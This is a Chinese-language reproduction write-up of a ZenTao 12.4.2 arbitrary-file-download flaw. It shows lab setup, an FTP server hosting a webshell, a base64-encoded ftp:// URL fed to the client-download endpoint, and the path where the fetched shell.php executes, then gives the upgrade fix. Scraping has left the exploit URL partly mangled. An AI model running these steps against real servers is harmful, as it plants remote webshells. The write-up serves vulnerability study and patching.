首頁 >運維 >安全 >禪道12.4.2後台管理員權限Getshell是怎麼樣的

禪道12.4.2後台管理員權限Getshell是怎麼樣的

WBOY
WBOY轉載
2023-05-16 15:43:121611瀏覽

0x00簡介

#禪道是一款專業的國產開源研發專案管理軟體,集產品管理、專案管理、品質管理、文件管理、組織管理和事務管理於一體,完整涵蓋了研發專案管理的核心流程。管理思想基於國際流行的敏捷專案管理方法——Scrum,在遵循其價值觀的基礎上,結合國內專案研發現狀,整合了任務管理、需求管理、Bug管理、用例管理等多種功能,覆蓋軟體從計劃到發布的整個生命週期。

0x01漏洞概述

禪12.4.2版本存在任意檔案下載漏洞,漏洞概述

禪12.4.2版本存在任意檔案下載漏洞,漏洞是因為client類別中download方法中過濾不嚴謹可以使用ftp達成下載文件的目的。且下載檔案儲存目錄可解析php文件,造成getshell。

0x02影響版本

禪≤ 12.4.2

0x03環境搭建

phpstudy2018   禪道12.4.2  禪道官方下載網址:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

禪道12.4.2後台管理員權限Getshell是怎麼樣的3.1. 下載完成後,放入phpstudy中安裝即可

禪道12.4.2後台管理員權限Getshell是怎麼樣的3.2. 檢查擴展,如果存在未通過的擴展,在phpstudy中開啟擴展即可。

禪道12.4.2後台管理員權限Getshell是怎麼樣的3.3.設定資料庫信息,這裡設定成自己的資料庫配置。

禪道12.4.2後台管理員權限Getshell是怎麼樣的3.4.設定帳號安裝完成

禪道12.4.2後台管理員權限Getshell是怎麼樣的#3.4.利用環境搭建,開啟ftp服務,以windows2008R2為例,在新增角色,新增ftp

禪道12.4.2後台管理員權限Getshell是怎麼樣的

##3.5.然後在Internet資訊服務下的網站添加ftp服務。 禪道12.4.2後台管理員權限Getshell是怎麼樣的

3.6.依照自己的狀況配置,下一步可禪道12.4.2後台管理員權限Getshell是怎麼樣的

禪道12.4.2後台管理員權限Getshell是怎麼樣的

禪道12.4.2後台管理員權限Getshell是怎麼樣的

禪道12.4.2後台管理員權限Getshell是怎麼樣的

3.7.在ftp目錄下放一個webshel​​l然後瀏覽器查看ftp是否可以正常存取

0x04漏洞複現禪道12.4.2後台管理員權限Getshell是怎麼樣的

1.先把ftp加上shell的路徑進行base64編碼禪道12.4.2後台管理員權限Getshell是怎麼樣的

加密前: ftp://192.168.3.200/shell.php

#加密後: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP,把加密後的base64放入exp中的裡

禪道12.4.2後台管理員權限Getshell是怎麼樣的http://127.0.0.1/zentaopms//index. /client-download-1--1.html

##3.使用以下連結路徑測試是否shell已下載至伺服器######http://192.168.3.200/zentaopms/www/data/client/1/shell.php################# #0x05修復方式#########1、升級到禪道12.4.3及之後的版本###

以上是禪道12.4.2後台管理員權限Getshell是怎麼樣的的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:yisu.com。如有侵權,請聯絡admin@php.cn刪除